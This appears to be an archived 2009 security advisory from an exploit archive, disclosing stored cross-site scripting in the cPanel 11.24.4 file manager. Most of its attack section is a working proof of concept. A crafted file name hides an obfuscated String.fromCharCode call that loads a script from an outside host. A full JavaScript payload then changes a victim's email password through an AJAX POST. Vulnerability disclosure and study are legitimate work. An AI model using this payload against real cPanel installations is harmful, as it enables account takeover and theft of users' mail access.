what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Cpanel File Manager Cross Site Scripting

Cpanel File Manager Cross Site Scripting
Posted Mar 18, 2009
Authored by Rizki Wicaksono | Site ilmuhacking.com

The Cpanel file manager in version 11.24.4-CURRENT suffers from multiple cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | 3cb9b9e490ecf0caa4e07b03f6a0c8a3b9f005a459d46096dd04acb34cadc31d

Cpanel File Manager Cross Site Scripting

Change Mirror Download
Cpanel File Manager XSS Vulnerability

Synopsis
-------------
Cpanel (www.cpanel.net) has two file manager application, standard and legacy one to manage files. Both of them are vulnerable to XSS attack. File name is presented unescaped so that an attacker can craft malicious file name to execute script on behalf of victims.

Version
-----------
this vulnerability was found on cpanel version 11.24.4-CURRENT
exploit here is already tested on: Firefox 3.0.7 and IE 8.0

Details
----------
legacy file manager (lfm) is more vulnerable than the standard one. In legacy file manager, only by viewing list of files, attacker code can be executed. In standard file manager, list of file is well escaped, but attacker still can inject script when victims click on any of these task: delete, copy, move, rename, edit, change permissions, extract, compress on file with malicious name.

to make browser load and execute external script, attacker can't directly use <script> tag because slash character is forbidden in file name. To overcome that restriction, attacker can inject script via <img> tag onError attribute and set src attribute with empty string to force error event always triggered. the script injected via <img> tag generate <script> tag to execute external script by using document.write() function.

PoC exploit
-----------------
malicious file name:

<img src='' onerror='document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,105,108,109,117,104,97,99,107,105,110,103,46,99,111,109,47,120,46,106,115,62,60,47,115,99,114,105,112,116,62))'>

that <img> generate this html tag to make browser load and execute external script:

<script src=http://ilmuhacking.com/x.js></script>

that poc exploit works for both file manager application (standard and legacy).

PoC payload: change victim email password
----------------------------------------------------------------
by making POST request using ajax functions to /frontend/x3/mail/dopasswdpop.html attacker can change one of victim email password. the script below is an example payload that executed from external url.

----------------
var http_request = false;
function makePOSTRequest(url, parameters) {
http_request = false;
if (window.XMLHttpRequest) { // Mozilla, Safari,...
http_request = new XMLHttpRequest();
if (http_request.overrideMimeType) {
http_request.overrideMimeType('text/html');
}
} else if (window.ActiveXObject) { // IE
try {
http_request = new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try {
http_request = new ActiveXObject("Microsoft.XMLHTTP");
} catch (e) {}
}
}
if (!http_request) {
alert('Cannot create XMLHTTP instance');
return false;
}
http_request.onreadystatechange = alertContents;
http_request.open('POST', url, true);
http_request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http_request.setRequestHeader("Content-length", parameters.length);
http_request.setRequestHeader("Connection", "close");
http_request.send(parameters);
}
function alertContents() {
if (http_request.readyState == 4) {
if (http_request.status == 200) {
result = http_request.responseText;
alert(result);
} else {
alert('There was a problem with the request.');
}
}
}
var poststr = "quota=" + encodeURI("250") + "&password2=" + encodeURI("newpassword") +
"&password=" + encodeURI("newpassword") + "&email=" + encodeURI("testemail") +
"&domain=" + encodeURI("ilmuhacking.com");
makePOSTRequest('/frontend/x3/mail/dopasswdpop.html', poststr);

CREDITS
------------------
This vulnerability has been discovered by Rizki Wicaksono ( http://www.ilmuhacking.com )
The Indonesian article at http://www.ilmuhacking.com/web-security/cpanel-file-manager-xss-attack/ gives more detail about this vulnerability.
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close